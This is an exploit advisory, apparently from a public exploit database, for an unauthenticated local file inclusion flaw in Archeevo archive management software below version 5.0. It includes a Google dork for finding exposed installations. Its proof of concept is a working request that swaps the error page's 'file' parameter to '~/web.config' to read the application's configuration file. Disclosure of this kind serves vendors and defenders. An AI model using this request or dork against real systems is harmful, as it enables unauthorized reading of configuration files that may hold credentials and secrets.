# Exploit Title: Archeevo 5.0 - Local File Inclusion# Google Dork: intitle:"archeevo"# Date: 01/15/2021# Exploit Author: Miguel Santareno# Vendor Homepage: https://www.keep.pt/# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/# Version: < 5.0# Tested on: windows# 1. Description
Unauthenticated user can exploit LFI vulnerability in file parameter.# 2. Proof of Concept (PoC)
Access a page that don’t exist like /test.aspx and then you will be redirected to
https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
/web.config file of the application.
https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
# 3. Research:
https://miguelsantareno.github.io/MoD_1.pdf
